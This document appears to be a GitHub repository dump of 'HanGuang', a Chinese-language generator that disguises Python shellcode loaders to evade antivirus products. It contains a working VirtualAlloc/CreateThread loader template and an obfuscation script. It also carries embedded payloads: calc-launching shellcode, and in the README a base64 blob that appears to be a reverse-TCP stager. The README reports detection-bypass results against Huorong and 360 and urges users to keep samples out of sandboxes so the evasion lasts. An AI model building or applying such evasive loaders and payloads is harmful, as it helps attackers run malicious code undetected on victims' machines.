├── .idea
├── .gitignore
├── HanGuang.iml
├── dictionaries
├── encodings.xml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
└── vcs.xml
├── README.md
├── calc.py
├── calc.raw
├── dist
├── calc.exe
└── shellcode.exe
├── hanguang.py
├── img
├── HanGuang1.png
├── HanGuang10.png
├── HanGuang11.png
├── HanGuang2.png
├── HanGuang3.png
├── HanGuang4.png
├── HanGuang5.png
├── HanGuang8.png
└── HanGuang9.png
├── modle
├── __pycache__
│ ├── auto_random.cpython-37.pyc
│ └── autor.cpython-37.pyc
├── auto_random.py
└── autor.py
├── shellcode.py
└── source.py
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../:\onedrive\桌面\HanGuang\.idea/dataSources/
6 | /dataSources.local.xml
7 | # 基于编辑器的 HTTP 客户端请求
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/.idea/HanGuang.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/dictionaries:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## 含光---免杀生成器(含光的加载器编写思路)
2 |
3 |
4 |
5 | ### 最简单的加载器免杀思路
6 |
7 | 1. 将加载器的变量每次生成都要随机也就是变量混淆,
8 | 2. 同时在每行之间插入无效指令:比如随机打印,循环打印,随机数计算加减乘除
9 |
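10 | 这个思路的主要作用是加载器伪装。不管shellcode如何变化、如何加密解密,最后都要回到这个模板里面加载。就算是采用分离免杀的方法,shellcode本身不会被杀,但是这个加载器会被杀,所以经过这样伪装之后加载器可以存活,为后面各种花里胡哨的免杀奠定基础。需要注意的是,这种伪装只改变变量名、填充语句等静态特征;模板中 VirtualAlloc(参数 0x3000、0x40)、RtlMoveMemory、CreateThread 的调用顺序和参数在每次生成的文件里都保持不变,基于行为或API调用序列的检测通常不受这些改动影响。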
11 |
12 |
13 | source.py是模板
14 |
15 | shellcode.py是本程序生成的加载器,可以使用pyinstaller直接构建成exe
16 |
17 | ### 实践过程
18 |
19 | 1. 这是从网上找来的python加载shellcode的代码,只要搜索谁都能找得到。把它作为模板进行伪装。
20 |
21 | ```python
22 | import ctypes,base64,time
23 |
24 |
25 | buf = ""
26 |
27 | shellcode = bytearray(buf)
28 | # 设置VirtualAlloc返回类型为ctypes.c_uint64
29 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
30 | # 申请内存
31 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
32 |
33 | # 放入shellcode
34 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
35 | ctypes.windll.kernel32.RtlMoveMemory(
36 | ctypes.c_uint64(ptr),
37 | buffered,
38 | ctypes.c_int(len(shellcode))
39 | )
40 | # 创建一个线程从shellcode防止位置首地址开始执行
41 | handle = ctypes.windll.kernel32.CreateThread(
42 | ctypes.c_int(0),
43 | ctypes.c_int(0),
44 | ctypes.c_uint64(ptr),
45 | ctypes.c_int(0),
46 | ctypes.c_int(0),
47 | ctypes.pointer(ctypes.c_int(0))
48 | )
49 | # 等待上面创建的线程运行完
50 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
51 | ```
52 |
53 | 2. 先进行一次base64编码,方便替换shellcode:要读取的是raw原始格式的payload,它以二进制形式存储。
54 |
55 | 
56 |
57 | 3. 编写一个用来生成随机的类
58 |
59 | 
60 |
61 | 4. 编写随机变量生成函数
62 |
63 | 模板中随机变量只有三个,分别是shellcode、ptr、buffered。只需要将这三个变量替换为随机字符串即可。
64 |
65 | 随机字符串这里设置为最小长度为5,最大长度为10,第一个字符不能为数字(因为这不符合python语法)。
66 |
67 | 
68 |
69 | 5. 编写随机空白指令函数
70 |
71 | 先在模板的每一行中间插入command1-7作为占位符,用来替换。同时添加flag_to_replace占位符用来替换shellcode。所以模板就变成了下面这样。
72 |
73 | ```python
74 | import ctypes,base64,time
75 |
76 | command1
77 |
78 | shellcode = base64.b64decode('flag_to_replace')
79 |
80 | command2
81 |
82 | shellcode = bytearray(shellcode)
83 |
84 | command3
85 |
86 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
87 |
88 | command4
89 |
90 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
91 |
92 | command5
93 |
94 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
95 |
96 | command5
97 |
98 | ctypes.windll.kernel32.RtlMoveMemory(
99 | ctypes.c_uint64(ptr),
100 | buffered,
101 | ctypes.c_int(len(shellcode))
102 | )
103 |
104 | command7
105 |
106 | handle = ctypes.windll.kernel32.CreateThread(
107 | ctypes.c_int(0),
108 | ctypes.c_int(0),
109 | ctypes.c_uint64(ptr),
110 | ctypes.c_int(0),
111 | ctypes.c_int(0),
112 | ctypes.pointer(ctypes.c_int(0))
113 | )
114 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
115 | ```
116 |
117 | 函数处理也很简单,只需要替换掉占位符即可
118 |
119 | 
120 |
121 | 生成空白指令函数也很简单,就是一个列表里面存了一些空白指令,然后从列表里面随机返回一个指令。当然空白指令也是随机生成的。
122 |
123 | 
124 |
125 | 最终生成一个新的py文件,效果如下
126 |
127 | ```python
128 | import ctypes,base64,time
129 |
130 | neccpbehr7bzncnpqywr3v2ol1svhdf5sorlkam74un12v9e7oe0rwvsqgqdc41m2n98vla7evs74507267fjx3qp7dlhbubbvvn7k79xee2hop9y9qubj2ewhp3sb48hs1jutjttoqj8cv7m8tt4kcodmylsapgme8rbpvkkoq4mql82ez5tyehhygnk3s0hzpg4zlhzs8x7ju84e6x6acmnzrewpp6stb2q2g388ixfemy07cvr81szqg274k9clkug8t3vkbpkp7i5v2ztqug4lv7a65f2fubnxxj82o33tmvalu5zbyt5mda6p8zes6bstmwht23avbaci92ncppggtnbe37d648db3vbwipr38t8newrrrdhm2wngi27op1ix2eavi5mzlrhu7uvpscxsq0ggqfecihb9lxwg3p8h8lz1zbwkw7os41z3xgjj6kx54hf0vzqgwht1spbrb2wkt7nt1lu5p7eanl9r2fa3lzfujm6af809ywyh1doisakex5ijqo3h7v3qccayykmpbf4zztzpf821b350p5kk67364pltin0hrubn4ooglzkehc65xvoi94yp951mtm4candx8n4nu78q81sutt4v00h1mbasdw2ypqy8o9g3 = 42048826 - 7411178
131 |
132 | s50zd4mc = base64.b64decode('/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSA+3SkpNMclIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJIi1IgQVGLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ESLQCCLSBhQSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYQVheSAHQWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKi1hUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V')
133 |
134 | time.sleep(3)
135 |
136 | s50zd4mc = bytearray(s50zd4mc)
137 |
138 | bc53udd6mwe8ucehku7ac9jq82chpmeylog1dfnvjf63ipd4tj1y0fl8youygux5gdi3wygp0qiyoqbxx0een59un7pq8o7xwneqoi0arnopsjb3pvzkll7bji5z1ebobtrtm9dlpv63utnucm27sn96cs3zvkbzsxm1zzomp2db5zmlpmq3i2q6plpgm0l3tjtotdj7os6v9kb500mis0fpfn0yhh3myzzij8r7gdnyvoedhcnxpjxoogs95wkucczqmy9xr8qw5zfhzuaj87kxhmpt9wdx9s2q5wylfsvl8wr8mtl2vl6bc65dg4qqmfgrk2mn1tawb53bumgcrtcf7r1db6nyr1c3d592n6joftfbretjm1f2r7bnj3mu6trnjynvsp8juw3jxqk9jk8g87efy1jo231winmxscb2u2qhv0m3q5l1nizghyqpv7ilata7r26pqmlob3tt9rcyljcw5snjrt7b0tst08i5jostyyk0pxiidivo0uy68npugwl627c3ezht26miz4ltszk = "xaalc3nhqnszkylpx7t4gjukbs1re6dio2puzh3lwr8575ozew4hesx9aiyc1z1m9as5ghx4jc9f8i1lqhiqcgaddu1czescvrsf2dfsx5z7d09x1hh8fnv0914dyhp7gfh30ischxrqwfcfkcbqqhekki7m45hnfty2cbjd15mgq2dkrruunj78w6ao2xtbo3jhvfttc7ll46s1hezozx074j2oul4g8dfv1my9spaacrc2n8ase3x0pylcc5q4gtfoli9abakoz61fedfyjpis56w7bdhedvzwvgmma5b8vhk1tt8vfhcvz4mmdal7aaft7x76fnfto7a8nbbz593ua7b04m2vqbfwa6f2gwbxywo8suivisqln96ozl6k1x9oianju5awtzuk61iycoc75xwnm17xha7pp1pdm4m3aomvobtrcotd170xccplkrlypz6biuukkas970v5o9cxmveqdj87q3pkha1tyg3fysemkalme1wl9fhdohqvc6hrvlov4bty307c5dhdjupmbchch6zgkotlcmqg8uk4dv464c0er06x24eafdjr92i5a3a1b0suq9ujqcd0z8ef6dkqua54zyi9jpcdomza9g02v4k4r0nyixhjprfd95imprtiixcrdy79waunq4h25f4hn075rzy0alk1rnj3j0oqtuieqj5qg8ccz0mtc3gpswpyckryfydvt0nw8t6iapicbfu08rjqkce4rx8s0cybjiwowkfwbfjad49u06nm7p0md363b34vvvvejppx0utl3e47uez7l88mn2jvr5jx50clcw5ayy6afo0qpv36e9up5dbyk" + 
"dc8rclrz41gvmed5lhandwj87lifvvdwtk800lfrm4bf33og8a9o77y4x6ingugcimo7kldrmu0b01emm85jxs842gcdg6tmjcf56fysymyl1drlnunos5eja55b82yz9424vdt4stt7g2x81nqg7ch4gx0a5pxrr8frcbxk0zm7539a7ytu1v7ie2u2hx5yv6ev0pb5gsn8n0siykme0tlwqxfw7vrwm99gu216ciutwr5gu19cn1j9n6kujjyv5bbo2tbpded0ssij57cq4fcgmkjw91it3pyhjpbwhy2a4npxyz3j7l1pqppi1ykfm4kgrrwysptv0zzsjks47q989aegsdk27uqh5uj6hvpryz1cvpzodk38jwrqpf7cz4973w6fdptyoovwxfpqubdsk32fq3bcoxyr3a9nqckt7u90t48dxugkpnurnbr1iygu9qi77jqqi7d3k19ljdbogzqfxlsu8zbr8qkond492fwl71w74covapxl7aaxp6m4jx9204ym03rfyf9ewscugi2hom1vp5hnosifguw4v886zv2qji30vvtl1yjrago4tmmae0knkfyaakkh27l3a9fru7o93vtwfd48r4ffw73k8lp5k8g8q2tz052kndfpsdvkg93h9gsna85qt198h3niir72lo4dvh9lixtonvrpfo7skbosg2ps8wa1ja1uwul5s7uxrzj79soyo4aajok52sw3pvgj1ljmai40"
139 |
140 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
141 |
142 | nds43ymxsskkaa25dkbcqysbkg8c3yzr6qdgnsb8vizunrexgmoz405d2x1enahbf0qvg9quiwpec39cgnmykcqi2aih52xu85n72b84gtsgu5z04qj6r5dgawxlsp1hbjpcetqtf4lxuj0k3a5y6dvhsb85dsso51ar4b9oqir40cbjqy5fvlqzx7cp86y1jvpuklbgbubj1nijs02gzt3ih7jg8ltzxfll2ul4pnsge6g9sypcmhv2anj4ipy74dhb8qglk8zgc0ez6sc6zbodrbeseleka2ze51dtm7dqtri1nn674x0e1j5jd5b8w9rjdub3f9dt22bshqw8vfmuz4zvfyjs2wv4fo1ne96cqvgiikv0j9aq66pth3qn0pieh2m43hmbjglzzj4exjjgi8g2893161b90asvuy0rm6ai4ho0ir3z9aibjydhdxrktq4fxat1n2qv12oj7zht6wafbg8430fk6wi9yzfhqn89waypsa4sj254bli99r8ddbkh4hfa5o5wsfw7oqargmpkvs68cna45ac20yorov9lve6dvxg4gwklfabj15zwsoi6k9iuy460hholsqcd3759klqjrw6s178ythm4wfi5ujrf2q6lzko1ikoc2698tribju621y2qbnk3i3jvecxlncbrvwc203mrdlytwxjmpvflw89mqu41opniz338y57h0x31 = 79966329 / 39623958
143 |
144 | ui41vo0urj = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(s50zd4mc)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
145 |
146 | ehvapdqxisaekt9fjnt1xyw03pqvrl08q4crdtpmkfj7heaabsjuvzjc8oqzok6jhlo9ymh31za3tueanzbqpj6m8hxxa2ux1ta4b3udhpdurdnk4ampyldamcpi8sj95rlz0xeecytbwbq46t473t9dpq8d8ocznfstrk9d9x5ncw8ntj0vd2miq79yusghldkn7cnunr5zzwz4m87lw6g4vn2lcf61skxmeuzadas71tc5tdl0w01uy43vyyb5nsaexj9udjaxxro3b0ge1rjbn8l9fm743pjoug17yi2w465c8txylb9iteoe6on3tzxq80jb5c9st100x5obxkdsv5hfjmv1ek89jjxkfyzgepup7vuu0ei51eo0p2win78t57w793471wuyzzir6e6t4p4tg3dot664jgy0tpaa9g4djhd8y7v6ts76mjlks4a0prkanh9gq5lmjefuat3a66cvyww38vq2o0qf77kp2nsa4s7syf66jtrd4jeqva10ds6w4ihz8sc6a8vaio55911sy3d9dp0bfeio4uxppk5nf2vq29asvytl6hcfroxjl6hpzsujlw6jvvhdm1ghmkjiqfmy6ouv6xa709xs9p5jj13t0iijy7okxcqrkmkpyemls1wwvdi0hj11nf1sj546v337zjyozepce3ob6jyexi53wrq2gnyvy5a025 = 338387 + 51678963
147 |
148 | xqnsl = (ctypes.c_char * len(s50zd4mc)).from_buffer(s50zd4mc)
149 |
150 | ehvapdqxisaekt9fjnt1xyw03pqvrl08q4crdtpmkfj7heaabsjuvzjc8oqzok6jhlo9ymh31za3tueanzbqpj6m8hxxa2ux1ta4b3udhpdurdnk4ampyldamcpi8sj95rlz0xeecytbwbq46t473t9dpq8d8ocznfstrk9d9x5ncw8ntj0vd2miq79yusghldkn7cnunr5zzwz4m87lw6g4vn2lcf61skxmeuzadas71tc5tdl0w01uy43vyyb5nsaexj9udjaxxro3b0ge1rjbn8l9fm743pjoug17yi2w465c8txylb9iteoe6on3tzxq80jb5c9st100x5obxkdsv5hfjmv1ek89jjxkfyzgepup7vuu0ei51eo0p2win78t57w793471wuyzzir6e6t4p4tg3dot664jgy0tpaa9g4djhd8y7v6ts76mjlks4a0prkanh9gq5lmjefuat3a66cvyww38vq2o0qf77kp2nsa4s7syf66jtrd4jeqva10ds6w4ihz8sc6a8vaio55911sy3d9dp0bfeio4uxppk5nf2vq29asvytl6hcfroxjl6hpzsujlw6jvvhdm1ghmkjiqfmy6ouv6xa709xs9p5jj13t0iijy7okxcqrkmkpyemls1wwvdi0hj11nf1sj546v337zjyozepce3ob6jyexi53wrq2gnyvy5a025 = 338387 + 51678963
151 |
152 | ctypes.windll.kernel32.RtlMoveMemory(
153 | ctypes.c_uint64(ui41vo0urj),
154 | xqnsl,
155 | ctypes.c_int(len(s50zd4mc))
156 | )
157 |
158 | print("y5v8cap00i4ofd2qmwbsqrkx55oo85b36mdmdfnin9dada8eigu9mwwgsiilccyz0mqs5093c02oxd6gez7rdf9mrlh7597epbiurh1th1tzp7nmtba548veex163593kg4jx45hyuhnrcz9aanpirlowbvmua5f3yrs9kthg5d94b25y2gwiiy9owp7lxz1y0a8o0utcxgvkfv2relwf9hhn7int1jibwfmp83pfyz0mf5g8dl975ic5b3xt4f72rs7f4zl4rcx6vgi1pyhiztz9kxyy8ah8gdggtjyj9luxpyoj0638p80l2rmmbp3hof5jh1po9hnii2hggkch8k6natj0kz1r37l0oytpkl7ac3bi6n98qelitt18kvosh6kqbt1xec676k3s6d72nhzt1pa86fkp91xvicuh2mv3vpkvt9jxmaf3ktf201zrjs296wwu6881nk07vxipprspsthbzlu4jsiwca1gvwu1b7pun1satn4lfvh61j0o8dq6dzxaqgjnaz4h9v8etwvaqkwy62hfrjgenrtup2iktedcxs59fk88zwsm5as5wa8w1hodhc3qgaopo7udkta9j1prdoacsduqf9ce4nsjka1a4baf320ydmifcaufd94zemh58e6cbgc45cxdh86tosw4ib4nzi0m81vqbex9nd2rrgdtusu7ussok7ab7flph4ld3wthwjc12bvdfzfuye3kauqbq9u1")
159 |
160 | handle = ctypes.windll.kernel32.CreateThread(
161 | ctypes.c_int(0),
162 | ctypes.c_int(0),
163 | ctypes.c_uint64(ui41vo0urj),
164 | ctypes.c_int(0),
165 | ctypes.c_int(0),
166 | ctypes.pointer(ctypes.c_int(0))
167 | )
168 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
169 |
170 | ```
171 |
172 | 最后使用pyinstaller打包成exe
173 |
174 | ```
175 | pyinstaller -F shellcode.py
176 | ```
177 |
178 |
179 |
180 | ### 效果展示(2021年3月24日)
181 |
182 | #### 火绒
183 |
184 | 
185 |
186 | #### 360
187 |
188 | 
189 |
190 | 
191 |
192 | 
193 |
194 |
195 |
196 |
197 |
198 | TODO:使用其他语言重构(c语言,go语言等),尽量减小体积和特征。
199 |
200 |
201 |
202 | ## 内部免杀工具含光加载器部分使用的是这个思路,由于某些原因不便开放源代码。
203 |
204 | 打包发布一个精简版本,可以去 [release]( https://github.com/MrWQ/HanGuang/releases) 下载使用,低调使用。
205 |
206 | 为了持久免杀,不要上传沙箱。
207 |
208 | 为了持久免杀,不要上传沙箱。
209 |
210 | 为了持久免杀,不要上传沙箱。
211 |
212 | 免责声明:仅供学习交流切勿用于非法用途。
213 |
--------------------------------------------------------------------------------
/calc.py:
--------------------------------------------------------------------------------
# Sample payload bytes, assembled into `buf` in 13-byte chunks (12 in the last one).
# The final five bytes, 63 61 6c 63 00, are the NUL-terminated ASCII string "calc".
# NOTE(review): the `buf += b"..."` layout looks like msfvenom's Python output
# format, and hanguang.py's text branch extracts exactly such "\xNN" groups -
# presumably this file is fed to it as text rather than imported; confirm.
buf = b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00"
23 |
--------------------------------------------------------------------------------
/calc.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/calc.raw
--------------------------------------------------------------------------------
/dist/calc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/dist/calc.exe
--------------------------------------------------------------------------------
/dist/shellcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/dist/shellcode.exe
--------------------------------------------------------------------------------
/hanguang.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/23 13:46
4 | # @Author : ordar
5 | # @File : hanguang.py
6 | # @Project : HanGuang
7 | # @Python : 3.7.5
8 | import base64
9 | import os
10 | import re
11 |
12 | from modle.autor import AUTOR
13 | import sys
14 |
# Shared AUTOR instance; its `.random` attribute supplies the random words and
# filler statements used by make_variable_random / make_command_random below.
auto = AUTOR()

# Source text of the generated script (the __main__ block writes it to
# shellcode.py). Three kinds of placeholder are substituted before writing:
#   * 'flag_to_replace'  -> the base64 text of the input bytes (__main__)
#   * commandN tokens    -> one filler statement each (make_command_random)
#   * shellcode / ptr / buffered -> random identifiers (make_variable_random)
# The template contains `command5` twice and no `command6`, so both `command5`
# positions receive the same filler statement in every generated file.
# Everything else is emitted unchanged each time: the import line, the
# ctypes.windll.kernel32 calls VirtualAlloc, RtlMoveMemory, CreateThread and
# WaitForSingleObject in that order, the VirtualAlloc arguments 0x3000 and
# 0x40, and the variable name `handle`.
# NOTE(review): 0x3000 and 0x40 are the Win32 values MEM_COMMIT|MEM_RESERVE and
# PAGE_EXECUTE_READWRITE; these fixed values and the fixed call order are what
# a static or behavioural rule can key on regardless of the renaming.
make_shellcode = """
import ctypes,base64,time

command1

shellcode = base64.b64decode('flag_to_replace')

command2

shellcode = bytearray(shellcode)

command3

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

command4

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

command5

buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

command5

ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buffered,
ctypes.c_int(len(shellcode))
)

command7

handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""
60 |
61 |
def make_variable_random(shellcode):
    """
    Rename the three template identifiers to random words.

    The names ``shellcode``, ``ptr`` and ``buffered`` are handled one after
    another; each gets one freshly drawn word (5-10 characters, first
    character a letter) that str.replace substitutes at every occurrence.
    Nothing else in the text is renamed.

    :param shellcode: script text to rewrite
    :return: the text with the three names replaced
    """
    for fixed_name in ("shellcode", "ptr", "buffered"):
        replacement = auto.random.auto_random_word(
            min_length=5, max_length=10, first_str_no_num=True)
        shellcode = shellcode.replace(fixed_name, replacement)
    return shellcode
68 |
def make_command_random(shellcode):
    """
    Fill the ``command1`` to ``command7`` placeholders with filler statements.

    One statement is drawn per placeholder name, in numeric order, and
    str.replace substitutes it wherever that name occurs, so a name that
    appears more than once in the text receives the same statement each time
    and a name that does not appear changes nothing.

    :param shellcode: script text containing the placeholders
    :return: the text with the placeholders substituted
    """
    for slot in range(1, 8):
        filler = auto.random.auto_random_void_command()
        shellcode = shellcode.replace(f"command{slot}", filler)
    return shellcode
79 |
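def get_file_content(file_path):
    """
    Read a file in binary mode and return its bytes.

    :param file_path: path of the file to read
    :return: the file content as bytes, or None when the file cannot be read
    """
    try:
        with open(file_path, 'rb') as f:
            return f.read()
    except (OSError, TypeError, ValueError):
        # Missing/unreadable file or an unusable path value: keep the
        # "None on failure" contract. The former bare `except:` also swallowed
        # KeyboardInterrupt and SystemExit, which now propagate.
        return None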
86 |
87 |
if __name__ == '__main__':
    # The input file is the first command-line argument; its extension decides
    # how the bytes are obtained.
    file_path = sys.argv[1]
    file_type = os.path.splitext(file_path)[1]
    if file_type in ('.raw', '.bin'):
        # Binary input: the file's bytes are used as they are.
        payload = get_file_content(file_path)
    else:
        # Text input: every two-character group following "\x" is collected
        # and converted from hex.
        with open(file_path, 'r') as txt:
            file_content = txt.read()
        if not file_content:
            exit(-1)
        all_code = re.findall(r'\\{1}x(\w{2})', file_content)
        payload = b''.join(bytes.fromhex(pair) for pair in all_code)

    # Both branches print the base64 text and then its decoded bytes.
    code = base64.b64encode(payload).decode()
    print(code)
    b = base64.b64decode(code)
    print(b)

    # Substitute the placeholders in the template, then write the result to
    # shellcode.py in the current directory (an existing file is overwritten).
    make_shellcode = make_command_random(
        make_variable_random(
            make_shellcode.replace('flag_to_replace', code)))
    with open('shellcode.py', 'w') as shellfile:
        shellfile.write(make_shellcode)
118 |
119 |
--------------------------------------------------------------------------------
/img/HanGuang1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang1.png
--------------------------------------------------------------------------------
/img/HanGuang10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang10.png
--------------------------------------------------------------------------------
/img/HanGuang11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang11.png
--------------------------------------------------------------------------------
/img/HanGuang2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang2.png
--------------------------------------------------------------------------------
/img/HanGuang3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang3.png
--------------------------------------------------------------------------------
/img/HanGuang4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang4.png
--------------------------------------------------------------------------------
/img/HanGuang5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang5.png
--------------------------------------------------------------------------------
/img/HanGuang8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang8.png
--------------------------------------------------------------------------------
/img/HanGuang9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang9.png
--------------------------------------------------------------------------------
/modle/__pycache__/auto_random.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/modle/__pycache__/auto_random.cpython-37.pyc
--------------------------------------------------------------------------------
/modle/__pycache__/autor.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/modle/__pycache__/autor.cpython-37.pyc
--------------------------------------------------------------------------------
/modle/auto_random.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/5 15:53
4 | # @Author : ordar
5 | # @File : auto_random.py
6 | # @Project : autoer
7 | # @Python : 3.7.5
8 | import time
9 | import random
10 |
11 |
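class AUTO_RANDOM:
    """
    Random-value helpers: integers, single characters, words, random sleeps
    and randomly chosen filler statements.
    """

    def auto_random_int(self, max_int, min_int=0):
        """
        Return a random integer.

        :param max_int: upper bound (inclusive)
        :param min_int: lower bound (inclusive)
        :return: integer drawn with random.randint(min_int, max_int)
        """
        return random.randint(min_int, max_int)

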